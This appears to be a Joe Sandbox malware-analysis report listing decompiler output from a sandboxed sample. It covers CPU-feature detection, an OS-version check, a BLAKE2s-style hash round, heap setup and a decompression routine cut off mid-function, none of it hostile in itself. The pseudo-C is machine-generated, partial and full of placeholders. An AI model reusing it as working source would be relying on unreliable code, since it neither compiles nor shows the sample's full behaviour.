Opcode ID: 59a3b15a999435239fdd9da77fade964a96725b7584ffe0b03978225642b9e7b
Instruction ID: 33d6b6b1acdc7413efca40b19676b79099b37af0270a6f271bfb36b631be96b8
Opcode Fuzzy Hash: 59a3b15a999435239fdd9da77fade964a96725b7584ffe0b03978225642b9e7b
Instruction Fuzzy Hash: 58B13D3521060A9FDB15CF2CC486B657BE1FF45364F258AA8E8A9CF2A1C335DD91DB40

Uniqueness

Uniqueness Score: -1.00%

Function 00B7F654 Relevance: 1.6, APIs: 1, Instructions: 147
COMMON

Download Yara Rule

C-Code - Quality: 88%

			E00B7F654(signed int __edx) {
				signed int _v8;
				signed int _v12;
				signed int _v16;
				signed int _v20;
				signed int _v24;
				signed int _v28;
				signed int _v32;
				signed int _v36;
				signed int _v40;
				intOrPtr _t60;
				signed int _t61;
				signed int _t62;
				signed int _t63;
				signed int _t66;
				signed int _t67;
				signed int _t73;
				intOrPtr _t74;
				intOrPtr _t75;
				intOrPtr* _t77;
				signed int _t78;
				intOrPtr* _t82;
				signed int _t85;
				signed int _t90;
				intOrPtr* _t93;
				signed int _t96;
				signed int _t104;

				_t90 = __edx;
				 *0xbc1d20 =  *0xbc1d20 & 0x00000000;
				 *0xb9e7a0 =  *0xb9e7a0 | 0x00000001;
				if(IsProcessorFeaturePresent(0xa) == 0) {
					L23:
					return 0;
				}
				_v20 = _v20 & 0x00000000;
				_push(_t74);
				_t93 =  &_v40;
				asm("cpuid");
				_t75 = _t74;
				 *_t93 = 0;
				 *((intOrPtr*)(_t93 + 4)) = _t74;
				 *((intOrPtr*)(_t93 + 8)) = 0;
				 *(_t93 + 0xc) = _t90;
				_v16 = _v40;
				_v8 = _v28 ^ 0x49656e69;
				_v12 = _v32 ^ 0x6c65746e;
				_push(_t75);
				asm("cpuid");
				_t77 =  &_v40;
				 *_t77 = 1;
				 *((intOrPtr*)(_t77 + 4)) = _t75;
				 *((intOrPtr*)(_t77 + 8)) = 0;
				 *(_t77 + 0xc) = _t90;
				if((_v8 | _v12 | _v36 ^ 0x756e6547) != 0) {
					L9:
					_t96 =  *0xbc1d24;
					L10:
					_t85 = _v32;
					_t60 = 7;
					_v8 = _t85;
					if(_v16 < _t60) {
						_t78 = _v20;
					} else {
						_push(_t77);
						asm("cpuid");
						_t82 =  &_v40;
						 *_t82 = _t60;
						 *((intOrPtr*)(_t82 + 4)) = _t77;
						 *((intOrPtr*)(_t82 + 8)) = 0;
						_t85 = _v8;
						 *(_t82 + 0xc) = _t90;
						_t78 = _v36;
						if((_t78 & 0x00000200) != 0) {
							 *0xbc1d24 = _t96 | 0x00000002;
						}
					}
					_t61 =  *0xb9e7a0; // 0x6f
					_t62 = _t61 | 0x00000002;
					 *0xbc1d20 = 1;
					 *0xb9e7a0 = _t62;
					if((_t85 & 0x00100000) != 0) {
						_t63 = _t62 | 0x00000004;
						 *0xbc1d20 = 2;
						 *0xb9e7a0 = _t63;
						if((_t85 & 0x08000000) != 0 && (_t85 & 0x10000000) != 0) {
							asm("xgetbv");
							_v24 = _t63;
							_v20 = _t90;
							_t104 = 6;
							if((_v24 & _t104) == _t104) {
								_t66 =  *0xb9e7a0; // 0x6f
								_t67 = _t66 | 0x00000008;
								 *0xbc1d20 = 3;
								 *0xb9e7a0 = _t67;
								if((_t78 & 0x00000020) != 0) {
									 *0xbc1d20 = 5;
									 *0xb9e7a0 = _t67 | 0x00000020;
									if((_t78 & 0xd0030000) == 0xd0030000 && (_v24 & 0x000000e0) == 0xe0) {
										 *0xb9e7a0 =  *0xb9e7a0 | 0x00000040;
										 *0xbc1d20 = _t104;
									}
								}
							}
						}
					}
					goto L23;
				}
				_t73 = _v40 & 0x0fff3ff0;
				if(_t73 == 0x106c0 || _t73 == 0x20660 || _t73 == 0x20670 || _t73 == 0x30650 || _t73 == 0x30660 || _t73 == 0x30670) {
					_t96 =  *0xbc1d24 | 0x00000001;
					 *0xbc1d24 = _t96;
					goto L10;
				} else {
					goto L9;
				}
			}

0x00b7f654
0x00b7f657
0x00b7f661
0x00b7f672
0x00b7f824
0x00b7f827
0x00b7f827
0x00b7f678
0x00b7f67e
0x00b7f683
0x00b7f687
0x00b7f68b
0x00b7f68d
0x00b7f68f
0x00b7f692
0x00b7f697
0x00b7f6a0
0x00b7f6b1
0x00b7f6bc
0x00b7f6c2
0x00b7f6c3
0x00b7f6c9
0x00b7f6cc
0x00b7f6d6
0x00b7f6d9
0x00b7f6dc
0x00b7f6df
0x00b7f724
0x00b7f724
0x00b7f72a
0x00b7f72a
0x00b7f72f
0x00b7f730
0x00b7f736
0x00b7f768
0x00b7f738
0x00b7f73a
0x00b7f73b
0x00b7f741
0x00b7f744
0x00b7f746
0x00b7f749
0x00b7f74c
0x00b7f74f
0x00b7f752
0x00b7f75b
0x00b7f760
0x00b7f760
0x00b7f75b
0x00b7f76b
0x00b7f770
0x00b7f773
0x00b7f77d
0x00b7f788
0x00b7f78e
0x00b7f791
0x00b7f79b
0x00b7f7a6
0x00b7f7b2
0x00b7f7b5
0x00b7f7b8
0x00b7f7c3
0x00b7f7c8
0x00b7f7ca
0x00b7f7cf
0x00b7f7d2
0x00b7f7dc
0x00b7f7e4
0x00b7f7e9
0x00b7f7f3
0x00b7f801
0x00b7f814
0x00b7f81b
0x00b7f81b
0x00b7f801
0x00b7f7e4
0x00b7f7c8
0x00b7f7a6
0x00000000
0x00b7f823
0x00b7f6e4
0x00b7f6ee
0x00b7f719
0x00b7f71c
0x00000000
0x00000000
0x00000000
0x00000000

APIs

IsProcessorFeaturePresent.KERNEL32(0000000A), ref: 00B7F66A

Memory Dump Source

Source File: 00000000.00000002.268617007.0000000000B61000.00000020.00000001.01000000.00000003.sdmp, Offset: 00B60000, based on PE: true

Associated: 00000000.00000002.268588954.0000000000B60000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.269911240.0000000000B93000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.270239864.0000000000B9E000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.270239864.0000000000BA5000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.270239864.0000000000BC2000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.270395727.0000000000BC3000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_b60000_1JCAVkYU3U.jbxd

Similarity

API ID: FeaturePresentProcessor
String ID:
API String ID: 2325560087-0
Opcode ID: 50b09127dd7de08432ccbacc7de6bc1ab9de8a36370ace4385ba8382f4d5c9dc
Instruction ID: 83584b27a4dcbeabd6c83c87392198c81da55a29fc4f9dfa810f599f011d363e
Opcode Fuzzy Hash: 50b09127dd7de08432ccbacc7de6bc1ab9de8a36370ace4385ba8382f4d5c9dc
Instruction Fuzzy Hash: AA51A0B190060ADFDB28CF98E9817AAB7F0FB48315F24887AC429EB251D774DD00CB54

Uniqueness

Uniqueness Score: -1.00%

Function 00B6B146 Relevance: 1.5, APIs: 1, Instructions: 28
COMMON

Download Yara Rule

C-Code - Quality: 100%

			E00B6B146() {
				struct _OSVERSIONINFOW _v280;
				signed int _t6;
				intOrPtr _t12;
				intOrPtr _t13;

				_t12 =  *0xb9e020; // 0x2
				if(_t12 != 0xffffffff) {
					_t6 =  *0xba10a8;
					_t13 =  *0xba10ac;
				} else {
					_v280.dwOSVersionInfoSize = 0x114;
					GetVersionExW( &_v280);
					_t12 = _v280.dwPlatformId;
					_t6 = _v280.dwMajorVersion;
					_t13 = _v280.dwMinorVersion;
					 *0xb9e020 = _t12;
					 *0xba10a8 = _t6;
					 *0xba10ac = _t13;
				}
				if(_t12 != 2) {
					return 0x501;
				} else {
					return (_t6 << 8) + _t13;
				}
			}

0x00b6b149
0x00b6b158
0x00b6b196
0x00b6b19b
0x00b6b15a
0x00b6b160
0x00b6b16b
0x00b6b171
0x00b6b177
0x00b6b17d
0x00b6b183
0x00b6b189
0x00b6b18e
0x00b6b18e
0x00b6b1a4
0x00b6b1b3
0x00b6b1a6
0x00b6b1ac
0x00b6b1ac

APIs

GetVersionExW.KERNEL32(?), ref: 00B6B16B

Memory Dump Source

Source File: 00000000.00000002.268617007.0000000000B61000.00000020.00000001.01000000.00000003.sdmp, Offset: 00B60000, based on PE: true

Associated: 00000000.00000002.268588954.0000000000B60000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.269911240.0000000000B93000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.270239864.0000000000B9E000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.270239864.0000000000BA5000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.270239864.0000000000BC2000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.270395727.0000000000BC3000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_b60000_1JCAVkYU3U.jbxd

Similarity

API ID: Version
String ID:
API String ID: 1889659487-0
Opcode ID: b4db2c90871776c941d20f5619aa864d46caa0ed1e7555b125e23c997ab1fed1
Instruction ID: b08e280d3705d9cc33c249ba0a6c341b532972006f1cc96d0a71951e2c4e92dd
Opcode Fuzzy Hash: b4db2c90871776c941d20f5619aa864d46caa0ed1e7555b125e23c997ab1fed1
Instruction Fuzzy Hash: 64F030B4D00218DFDB28CB18ED92AD573F1FB49715F104695D51593390CB74A9C08F60

Uniqueness

Uniqueness Score: -1.00%

Function 00B640FE Relevance: 1.5, Strings: 1, Instructions: 276
COMMONCrypto

Download Yara Rule

C-Code - Quality: 76%

			E00B640FE() {
				signed int* _t187;
				void* _t190;
				signed int _t200;
				signed int _t201;
				signed int _t202;
				signed int _t208;
				signed int _t209;
				signed int _t210;
				signed int _t216;
				signed int _t217;
				signed int _t224;
				signed int _t232;
				signed int _t233;
				signed int _t234;
				signed int _t239;
				signed int _t240;
				signed int _t245;
				signed int _t246;
				signed int _t253;
				signed int _t254;
				signed int _t256;
				signed int _t258;
				intOrPtr _t259;
				signed int _t260;
				signed int _t262;
				signed int _t263;
				signed int _t265;
				signed int _t266;
				signed int _t272;
				signed int _t274;
				signed int _t276;
				signed int _t278;
				signed int _t280;
				signed int _t283;
				signed int _t286;
				signed int _t289;
				signed int _t292;
				intOrPtr _t295;
				signed int _t297;
				signed int _t299;
				signed int _t301;
				signed int _t303;
				signed int _t305;
				signed int _t306;
				signed int _t308;
				signed int _t310;
				void* _t311;
				signed int _t320;
				signed int _t323;
				signed int _t326;
				signed int _t328;
				intOrPtr _t329;
				signed int _t331;
				signed int _t332;
				intOrPtr _t335;
				signed int _t337;
				signed int _t339;
				signed int _t342;
				signed int _t344;
				signed int _t345;
				signed int _t347;
				signed int _t348;
				intOrPtr _t349;
				intOrPtr _t350;
				signed int _t352;
				signed int _t353;
				signed int _t354;
				intOrPtr _t355;
				signed int _t356;
				signed int _t358;
				signed int _t359;
				signed int _t361;
				void* _t362;
				void* _t363;
				void* _t364;

				_t295 =  *((intOrPtr*)(_t362 + 0xd0));
				_t187 =  *(_t295 + 0xf8);
				_t258 =  *_t187 ^ 0x510e527f;
				_t352 = _t187[1] ^ 0x9b05688c;
				_t266 = 0x10;
				memcpy(_t362 + 0xa0,  *(_t362 + 0xe0), _t266 << 2);
				_t363 = _t362 + 0xc;
				_push(8);
				_t190 = memcpy(_t363 + 0x5c,  *(_t295 + 0xf4), 0 << 2);
				_t364 = _t363 + 0xc;
				 *(_t364 + 0x20) =  *_t190 ^ 0x1f83d9ab;
				_t272 =  *(_t364 + 0x6c);
				_t335 = 0;
				 *(_t364 + 0x28) =  *(_t190 + 4) ^ 0x5be0cd19;
				 *(_t364 + 0x1c) =  *(_t364 + 0x78);
				 *(_t364 + 0x38) =  *(_t364 + 0x74);
				 *(_t364 + 0x18) = 0x6a09e667;
				 *(_t364 + 0x24) = 0xbb67ae85;
				 *(_t364 + 0x2c) = 0x3c6ef372;
				 *(_t364 + 0x34) = 0xa54ff53a;
				 *((intOrPtr*)(_t364 + 0x14)) = 0;
				 *(_t364 + 0x30) =  *(_t364 + 0x70);
				 *(_t364 + 0x10) = _t272;
				do {
					_t27 = _t335 + 0xb936c0; // 0x3020100
					_t31 = _t364 + 0x18; // 0x6a09e667
					_t320 =  *((intOrPtr*)(_t364 + 0x9c + ( *_t27 & 0x000000ff) * 4)) + _t272 +  *(_t364 + 0x5c);
					_t297 = _t320 ^ _t258;
					_t259 =  *((intOrPtr*)(_t364 + 0x14));
					asm("rol edx, 0x10");
					_t274 =  *_t31 + _t297;
					_t337 = _t274 ^  *(_t364 + 0x10);
					asm("ror esi, 0xc");
					_t200 =  *((intOrPtr*)(_t364 + 0x9c + ( *(_t259 + 0xb936c1) & 0x000000ff) * 4)) + _t337 + _t320;
					 *(_t364 + 0x18) = _t200;
					_t201 = _t200 ^ _t297;
					asm("ror eax, 0x8");
					 *(_t364 + 0x3c) = _t201;
					_t202 = _t201 + _t274;
					 *(_t364 + 0x48) = _t202;
					asm("ror eax, 0x7");
					 *(_t364 + 0x50) = _t202 ^ _t337;
					_t323 =  *((intOrPtr*)(_t364 + 0x9c + ( *(_t259 + 0xb936c2) & 0x000000ff) * 4)) +  *(_t364 + 0x30) +  *(_t364 + 0x60);
					_t299 = _t323 ^ _t352;
					_t353 =  *(_t364 + 0x38);
					asm("rol edx, 0x10");
					_t276 =  *(_t364 + 0x24) + _t299;
					_t339 = _t276 ^  *(_t364 + 0x30);
					asm("ror esi, 0xc");
					_t208 =  *((intOrPtr*)(_t364 + 0x9c + ( *(_t259 + 0xb936c3) & 0x000000ff) * 4)) + _t339 + _t323;
					 *(_t364 + 0x10) = _t208;
					_t209 = _t208 ^ _t299;
					asm("ror eax, 0x8");
					 *(_t364 + 0x44) = _t209;
					_t210 = _t209 + _t276;
					 *(_t364 + 0x58) = _t210;
					asm("ror eax, 0x7");
					 *(_t364 + 0x24) = _t210 ^ _t339;
					_t342 =  *((intOrPtr*)(_t364 + 0x9c + ( *(_t259 + 0xb936c4) & 0x000000ff) * 4)) + _t353 +  *(_t364 + 0x64);
					_t301 = _t342 ^  *(_t364 + 0x20);
					asm("rol edx, 0x10");
					_t278 =  *(_t364 + 0x2c) + _t301;
					_t354 = _t353 ^ _t278;
					asm("ror ebp, 0xc");
					_t216 =  *((intOrPtr*)(_t364 + 0x9c + ( *(_t259 + 0xb936c5) & 0x000000ff) * 4)) + _t354 + _t342;
					 *(_t364 + 0x40) = _t216;
					_t217 = _t216 ^ _t301;
					asm("ror eax, 0x8");
					 *(_t364 + 0x54) = _t217;
					_t260 = _t217 + _t278;
					_t355 =  *((intOrPtr*)(_t364 + 0x14));
					asm("ror eax, 0x7");
					 *(_t364 + 0x20) = _t260 ^ _t354;
					_t326 =  *((intOrPtr*)(_t364 + 0x9c + ( *(_t355 + 0xb936c6) & 0x000000ff) * 4)) +  *(_t364 + 0x1c) +  *(_t364 + 0x68);
					_t303 = _t326 ^  *(_t364 + 0x28);
					asm("rol edx, 0x10");
					_t280 =  *(_t364 + 0x34) + _t303;
					_t344 = _t280 ^  *(_t364 + 0x1c);
					asm("ror esi, 0xc");
					_t224 =  *((intOrPtr*)(_t364 + 0x9c + ( *(_t355 + 0xb936c7) & 0x000000ff) * 4)) + _t344 + _t326;
					 *(_t364 + 0x4c) = _t224;
					_t328 = _t224 ^ _t303;
					asm("ror edi, 0x8");
					_t356 = _t328 + _t280;
					asm("ror eax, 0x7");
					 *(_t364 + 0x1c) = _t356 ^ _t344;
					_t98 = _t364 + 0x18; // 0x6a09e667
					_t283 =  *((intOrPtr*)(_t364 + 0x9c + ( *( *((intOrPtr*)(_t364 + 0x14)) + 0xb936c8) & 0x000000ff) * 4)) +  *(_t364 + 0x24) +  *_t98;
					_t305 = _t283 ^ _t328;
					_t329 =  *((intOrPtr*)(_t364 + 0x14));
					asm("rol edx, 0x10");
					_t345 = _t305 + _t260;
					_t262 = _t345 ^  *(_t364 + 0x24);
					asm("ror ebx, 0xc");
					_t232 =  *((intOrPtr*)(_t364 + 0x9c + ( *(_t329 + 0xb936c9) & 0x000000ff) * 4)) + _t262 + _t283;
					 *(_t364 + 0x5c) = _t232;
					_t233 = _t232 ^ _t305;
					asm("ror eax, 0x8");
					 *(_t364 + 0x28) = _t233;
					 *(_t364 + 0x98) = _t233;
					_t234 = _t233 + _t345;
					_t263 = _t262 ^ _t234;
					 *(_t364 + 0x2c) = _t234;
					 *(_t364 + 0x84) = _t234;
					asm("ror ebx, 0x7");
					 *(_t364 + 0x30) = _t263;
					 *(_t364 + 0x70) = _t263;
					_t286 =  *((intOrPtr*)(_t364 + 0x9c + ( *(_t329 + 0xb936ca) & 0x000000ff) * 4)) +  *(_t364 + 0x20) +  *(_t364 + 0x10);
					_t265 = _t286 ^  *(_t364 + 0x3c);
					asm("rol ebx, 0x10");
					_t306 = _t265 + _t356;
					_t358 = _t306 ^  *(_t364 + 0x20);
					asm("ror ebp, 0xc");
					_t239 =  *((intOrPtr*)(_t364 + 0x9c + ( *(_t329 + 0xb936cb) & 0x000000ff) * 4)) + _t358 + _t286;
					_t258 = _t265 ^ _t239;
					 *(_t364 + 0x60) = _t239;
					asm("ror ebx, 0x8");
					_t240 = _t306 + _t258;
					_t359 = _t358 ^ _t240;
					 *(_t364 + 0x34) = _t240;
					 *(_t364 + 0x88) = _t240;
					asm("ror ebp, 0x7");
					 *(_t364 + 0x38) = _t359;
					 *(_t364 + 0x74) = _t359;
					_t289 =  *((intOrPtr*)(_t364 + 0x9c + ( *(_t329 + 0xb936cc) & 0x000000ff) * 4)) +  *(_t364 + 0x1c) +  *(_t364 + 0x40);
					_t361 = _t289 ^  *(_t364 + 0x44);
					asm("rol ebp, 0x10");
					_t308 =  *(_t364 + 0x48) + _t361;
					_t347 = _t308 ^  *(_t364 + 0x1c);
					asm("ror esi, 0xc");
					_t245 =  *((intOrPtr*)(_t364 + 0x9c + ( *(_t329 + 0xb936cd) & 0x000000ff) * 4)) + _t347 + _t289;
					_t352 = _t361 ^ _t245;
					 *(_t364 + 0x64) = _t245;
					asm("ror ebp, 0x8");
					_t246 = _t308 + _t352;
					_t348 = _t347 ^ _t246;
					 *(_t364 + 0x18) = _t246;
					 *(_t364 + 0x7c) = _t246;
					asm("ror esi, 0x7");
					 *(_t364 + 0x1c) = _t348;
					 *(_t364 + 0x78) = _t348;
					_t292 =  *((intOrPtr*)(_t364 + 0x9c + ( *(_t329 + 0xb936ce) & 0x000000ff) * 4)) +  *(_t364 + 0x4c) +  *(_t364 + 0x50);
					_t349 =  *((intOrPtr*)(_t364 + 0x14));
					_t331 = _t292 ^  *(_t364 + 0x54);
					asm("rol edi, 0x10");
					_t310 =  *(_t364 + 0x58) + _t331;
					asm("ror eax, 0xc");
					 *(_t364 + 0x10) = _t310 ^  *(_t364 + 0x50);
					_t335 = _t349 + 0x10;
					 *((intOrPtr*)(_t364 + 0x14)) = _t335;
					_t253 =  *((intOrPtr*)(_t364 + 0x9c + ( *(_t349 + 0xb936cf) & 0x000000ff) * 4)) +  *(_t364 + 0x10) + _t292;
					_t332 = _t331 ^ _t253;
					 *(_t364 + 0x68) = _t253;
					asm("ror edi, 0x8");
					 *(_t364 + 0x20) = _t332;
					 *(_t364 + 0x94) = _t332;
					_t254 = _t310 + _t332;
					_t272 =  *(_t364 + 0x10) ^ _t254;
					 *(_t364 + 0x24) = _t254;
					asm("ror ecx, 0x7");
					 *(_t364 + 0x80) = _t254;
					 *(_t364 + 0x10) = _t272;
					 *(_t364 + 0x6c) = _t272;
				} while (_t335 <= 0x90);
				_t350 =  *((intOrPtr*)(_t364 + 0xe0));
				_t311 = 0;
				 *(_t364 + 0x8c) = _t258;
				 *(_t364 + 0x90) = _t352;
				do {
					_t256 =  *(_t364 + _t311 + 0x7c) ^  *(_t364 + _t311 + 0x5c);
					 *(_t311 +  *((intOrPtr*)(_t350 + 0xf4))) =  *(_t311 +  *((intOrPtr*)(_t350 + 0xf4))) ^ _t256;
					_t311 = _t311 + 4;
				} while (_t311 < 0x20);
				return _t256;
			}

0x00b64104
0x00b6410e
0x00b6412a
0x00b64136
0x00b6413c
0x00b6413d
0x00b6413d
0x00b64149
0x00b6414c
0x00b6414c
0x00b6415e
0x00b64162
0x00b64166
0x00b64168
0x00b64170
0x00b64178
0x00b64180
0x00b64188
0x00b64190
0x00b64198
0x00b641a0
0x00b641a4
0x00b641a8
0x00b641ac
0x00b641ac
0x00b641bc
0x00b641c0
0x00b641c6
0x00b641c8
0x00b641cc
0x00b641cf
0x00b641d3
0x00b641de
0x00b641ea
0x00b641ec
0x00b641f0
0x00b641f2
0x00b641f5
0x00b641f9
0x00b641fb
0x00b64201
0x00b64204
0x00b6421e
0x00b6422b
0x00b6422d
0x00b64231
0x00b64234
0x00b6423f
0x00b64243
0x00b64248
0x00b6424a
0x00b6424e
0x00b64250
0x00b64253
0x00b64257
0x00b64259
0x00b64263
0x00b64266
0x00b64281
0x00b64287
0x00b64292
0x00b64295
0x00b64297
0x00b64299
0x00b6429e
0x00b642a0
0x00b642a4
0x00b642a6
0x00b642a9
0x00b642ad
0x00b642b4
0x00b642b8
0x00b642bb
0x00b642d1
0x00b642de
0x00b642e6
0x00b642f0
0x00b642f4
0x00b642f8
0x00b642fd
0x00b64301
0x00b64305
0x00b64307
0x00b6430a
0x00b64311
0x00b64314
0x00b6432e
0x00b6432e
0x00b64334
0x00b64336
0x00b6433a
0x00b64344
0x00b64349
0x00b64354
0x00b64359
0x00b6435b
0x00b6435f
0x00b64361
0x00b64364
0x00b64368
0x00b6436f
0x00b64371
0x00b64373
0x00b64377
0x00b64385
0x00b64388
0x00b6438c
0x00b6439b
0x00b643a8
0x00b643ac
0x00b643b6
0x00b643bb
0x00b643bf
0x00b643c4
0x00b643c6
0x00b643c8
0x00b643cc
0x00b643cf
0x00b643d2
0x00b643d4
0x00b643d8
0x00b643e6
0x00b643e9
0x00b643ed
0x00b643fc
0x00b64402
0x00b64411
0x00b64414
0x00b6441f
0x00b64423
0x00b64428
0x00b6442a
0x00b6442c
0x00b64430
0x00b64433
0x00b6443a
0x00b6443c
0x00b64440
0x00b6444b
0x00b6444e
0x00b64452
0x00b64461
0x00b64465
0x00b6446b
0x00b6446f
0x00b64472
0x00b6447a
0x00b6447d
0x00b64488
0x00b6448b
0x00b6449a
0x00b644a0
0x00b644a2
0x00b644a6
0x00b644a9
0x00b644ad
0x00b644b4
0x00b644b7
0x00b644b9
0x00b644bd
0x00b644c0
0x00b644c7
0x00b644cb
0x00b644cf
0x00b644db
0x00b644e2
0x00b644e4
0x00b644eb
0x00b644f2
0x00b644fc
0x00b64500
0x00b64503
0x00b64506
0x00b64515

Strings

gj, xrefs: 00B641BC

Memory Dump Source

Source File: 00000000.00000002.268617007.0000000000B61000.00000020.00000001.01000000.00000003.sdmp, Offset: 00B60000, based on PE: true

Associated: 00000000.00000002.268588954.0000000000B60000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.269911240.0000000000B93000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.270239864.0000000000B9E000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.270239864.0000000000BA5000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.270239864.0000000000BC2000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.270395727.0000000000BC3000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_b60000_1JCAVkYU3U.jbxd

Similarity

API ID:
String ID: gj
API String ID: 0-4203073231
Opcode ID: f9cb2fffd03360359b9a559d06e5c5107e49768bfc61e47d091d55a20c83325b
Instruction ID: 7f3b784402cf3b7600ee27a56d2a7e24525a38e76fc47699f0ee0e0a89efb55a
Opcode Fuzzy Hash: f9cb2fffd03360359b9a559d06e5c5107e49768bfc61e47d091d55a20c83325b
Instruction Fuzzy Hash: BAC13676A183818FC354CF29D88065AFBE1BFC8708F19892DE998D7311D734E949CB96

Uniqueness

Uniqueness Score: -1.00%

Function 00B8C030 Relevance: 1.3, APIs: 1, Instructions: 5
memoryCOMMON

Download Yara Rule

C-Code - Quality: 100%

			E00B8C030() {
				signed int _t3;

				_t3 = GetProcessHeap();
				 *0xbc26e4 = _t3;
				return _t3 & 0xffffff00 | _t3 != 0x00000000;
			}

0x00b8c030
0x00b8c038
0x00b8c040

APIs

GetProcessHeap.KERNEL32 ref: 00B8C030

Memory Dump Source

Source File: 00000000.00000002.268617007.0000000000B61000.00000020.00000001.01000000.00000003.sdmp, Offset: 00B60000, based on PE: true

Associated: 00000000.00000002.268588954.0000000000B60000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.269911240.0000000000B93000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.270239864.0000000000B9E000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.270239864.0000000000BA5000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.270239864.0000000000BC2000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.270395727.0000000000BC3000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_b60000_1JCAVkYU3U.jbxd

Similarity

API ID: HeapProcess
String ID:
API String ID: 54951025-0
Opcode ID: a74643094d7928245458c76f8c3f54a8fee963162055a46808d8f8db465493ac
Instruction ID: 68ca28e49f35bc2fe17bd61a8490020aa82bb9308053bdd4c5b8fd278fc20570
Opcode Fuzzy Hash: a74643094d7928245458c76f8c3f54a8fee963162055a46808d8f8db465493ac
Instruction Fuzzy Hash: C5A02230202200CFC300CF30BF0CB0C3BE8AA08BC0308003BA008C3030EF3088A0AB00

Uniqueness

Uniqueness Score: -1.00%

Function 00B762CA Relevance: .8, Instructions: 829
COMMONCrypto

Download Yara Rule

C-Code - Quality: 96%

			E00B762CA(intOrPtr __esi) {
				signed int _t344;
				signed int _t345;
				signed int _t346;
				signed int _t348;
				signed int _t349;
				signed int _t350;
				signed int _t351;
				signed int _t352;
				signed int _t353;
				signed int _t355;
				signed int _t356;
				signed int _t357;
				void* _t359;
				signed int _t361;
				intOrPtr _t363;
				signed int _t372;
				char _t381;
				void* _t385;
				signed int _t386;
				signed int _t387;
				intOrPtr _t389;
				signed int _t399;
				char _t408;
				unsigned int _t409;
				void* _t417;
				signed int _t418;
				signed int _t419;
				intOrPtr _t421;
				signed int _t424;
				char _t433;
				signed int _t436;
				signed int _t438;
				signed int _t441;
				signed int _t442;
				signed int _t443;
				signed int _t444;
				signed int _t447;
				signed int _t448;
				signed short _t449;
				signed int _t450;
				signed int _t454;
				unsigned int _t459;
				signed int _t463;
				signed int _t464;
				signed int _t465;
				signed int _t468;
				signed int _t469;
				signed short _t470;
				unsigned int _t475;
				signed int _t480;
				unsigned int _t482;
				signed int _t496;
				signed int _t499;
				signed int _t501;
				signed int _t504;
				signed int _t506;
				signed int _t508;
				signed int _t510;
				intOrPtr* _t512;
				intOrPtr* _t513;
				signed int _t514;
				intOrPtr* _t515;
				signed int _t516;
				signed int _t522;
				signed int _t524;
				signed int* _t525;
				intOrPtr _t526;
				void* _t529;
				signed int _t532;
				signed int* _t535;
				unsigned int _t538;
				signed int _t539;
				void* _t540;
				signed int _t543;
				signed int _t545;
				signed int _t548;
				signed int _t551;
				signed int _t554;
				void* _t556;
				signed int _t559;
				signed int _t560;
				intOrPtr* _t562;
				void* _t563;
				signed int _t565;
				signed int _t568;
				unsigned int _t575;
				signed int _t576;
				void* _t577;
				signed int _t580;
				void* _t583;
				signed int _t586;
				signed int _t589;
				signed int _t591;
				void* _t593;
				signed int _t596;
				intOrPtr* _t598;
				void* _t599;
				signed int _t602;
				void* _t605;
				signed int _t609;
				signed int _t610;
				intOrPtr* _t612;
				void* _t613;
				void* _t616;
				signed int _t619;
				intOrPtr* _t625;
				void* _t626;
				unsigned int _t633;
				signed int _t636;
				signed int _t637;
				unsigned int _t639;
				signed int _t642;
				void* _t645;
				signed int _t646;
				void* _t649;
				signed int _t650;
				signed int _t651;
				void* _t654;
				unsigned int _t656;
				unsigned int _t660;
				signed int _t663;
				signed int _t665;
				unsigned int _t666;
				signed int _t668;
				signed int _t669;
				signed int _t670;
				signed int _t671;
				signed short _t672;
				signed int _t673;
				signed int _t674;
				unsigned int _t678;
				signed int _t680;
				intOrPtr _t684;
				signed int _t686;
				signed int _t687;
				signed int _t688;
				signed int* _t689;
				char* _t692;
				char* _t693;
				signed int _t696;
				void* _t697;
				void* _t700;

				L0:
				while(1) {
					L0:
					_t684 = __esi;
					_t525 = __esi + 0x7c;
					while(1) {
						L1:
						 *_t525 =  *_t525 &  *(_t684 + 0xe6dc);
						if( *_t689 <  *((intOrPtr*)(_t684 + 0x88))) {
							goto L11;
						} else {
							_t513 = _t684 + 0x8c;
							goto L3;
						}
						while(1) {
							L3:
							_t700 =  *_t689 -  *((intOrPtr*)(_t684 + 0x94)) - 1 +  *_t513;
							if(_t700 <= 0 && (_t700 != 0 ||  *((intOrPtr*)(_t684 + 8)) <  *((intOrPtr*)(_t684 + 0x90)))) {
								break;
							}
							L6:
							if( *((char*)(_t684 + 0x9c)) != 0) {
								L97:
								_t360 = E00B75202(_t684);
								L98:
								return _t360;
							}
							L7:
							_push(_t513);
							_push(_t689);
							_t360 = E00B73E0B(_t684);
							if(_t360 == 0) {
								goto L98;
							}
							L8:
							_push(_t684 + 0xa0);
							_push(_t513);
							_push(_t689);
